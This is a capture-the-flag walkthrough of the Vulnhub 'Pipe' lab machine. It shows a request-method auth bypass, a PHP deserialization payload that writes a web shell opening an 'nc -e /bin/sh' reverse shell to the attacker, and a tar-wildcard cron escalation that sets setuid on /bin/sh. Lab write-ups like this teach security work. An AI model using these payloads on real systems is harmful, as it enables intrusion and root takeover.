tick.Tack

/dev/random: Pipe

/dev/random: Pipe from Vulnhub


root@kali:~/Security/pipe# nmap 192.168.0.118 -p- -T5 -n

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-21 04:55 CST
Warning: 192.168.0.118 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.118
Host is up (0.00019s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
35856/tcp open  unknown
MAC Address: 08:00:27:D7:0B:8C (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 513.72 seconds

nmap found four open ports; let's look at port 80 first.

...this is the first time I've run into a site whose front page immediately asks for a username and password.

No idea what 35856 is for, so let's scan it in more depth:

root@kali:~/Security/pipe# nmap 192.168.0.118 -p 22,80,111,35856 -A -O
...
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35856/tcp  status
|_  100024  1          44438/udp  status
35856/tcp open  status  1 (RPC #100024)

It turns out to be the port registered with rpcbind for the RPC status service.

With no idea what else could be done here, I went back to the web side and tried things at random.

Eventually I found that the authentication can be bypassed simply by using any request method other than GET.

Next, let's look at the page source:

<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
...
<form action="index.php" id="info_form" method="POST">
   <input type="hidden" name="param" value="" />
   <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>

The scriptz directory is browsable, and from it I obtained another file, "log.php.BAK".

This class writes the contents of data to filename when it is destructed:

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
        file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>

After clicking Show Artist Info at the bottom of the page, the browser POSTs some serialized data to index.php:

param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The+Treachery+of+Images";}

The serialization is done by php.js:

//   example 1: serialize(['Kevin', 'van', 'Zonneveld']);
//   returns 1: 'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
//   example 2: serialize({firstName: 'Kevin', midName: 'van', surName: 'Zonneveld'});
//   returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'

Next, change the contents of submit_form() to the data we want to send.

I chose to write into scriptz because I can browse the scriptz directory directly to confirm whether the write succeeded.

And the contents of data appear to have been written to yo.php successfully.

Next, let's see whether we can get a reverse shell back.

Modify the HTML directly:

<script>
function submit_form() {
  var object = serialize({filename: '/var/www/html/scriptz/shell.php', data: '<?php passthru("nc -e /bin/sh 192.168.0.115 22234"); ?>'});
  object = object.substr(object.indexOf("{"),object.length);
  object = "O:3:\"Log\":2:" + object;
  document.forms[0].param.value = object;
  document.getElementById('info_form').submit();
}
</script>

After browsing to http://192.168.0.117/scriptz/shell.php the browser hangs:

root@kali:~/Security/pipe# nc -lp 22234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux pipe 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64 GNU/Linux

shell GET!

After some quick information gathering, I found a user, rene, whose home directory is not permission-restricted:

ls -al
total 208
drwxrwxrwx 2 rene rene   4096 Dec 23 05:04 .
drwxr-xr-x 3 rene rene   4096 Jul  6 07:42 ..
-rw-r--r-- 1 rene rene 124078 Dec 23 05:00 backup.tar.gz
-rw-r--r-- 1 rene rene  26558 Dec 23 05:02 sys-12512.BAK
-rw-r--r-- 1 rene rene  11402 Dec 23 05:01 sys-23924.BAK
-rw-r--r-- 1 rene rene   7231 Dec 23 05:04 sys-2448.BAK
-rw-r--r-- 1 rene rene  27182 Dec 23 05:03 sys-5018.BAK

The backup directory seems to produce a new file every minute, and every five minutes they are packed into backup.tar.gz.

Presumably a cron job is running; /etc/crontab happens to be readable, so let's look at the cron configuration:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

Only the contents of /usr/bin/compress.sh can be read:

cat compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

The way PATH is set here means the commands cannot be hijacked by a substitute binary.

It looks like tar is the only route to command injection.

So I simply set the setuid bit on /bin/sh:

echo "chmod u+s /bin/sh" > shell.sh

Once the cron job fires, root privileges are obtained:

# sh
sh
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7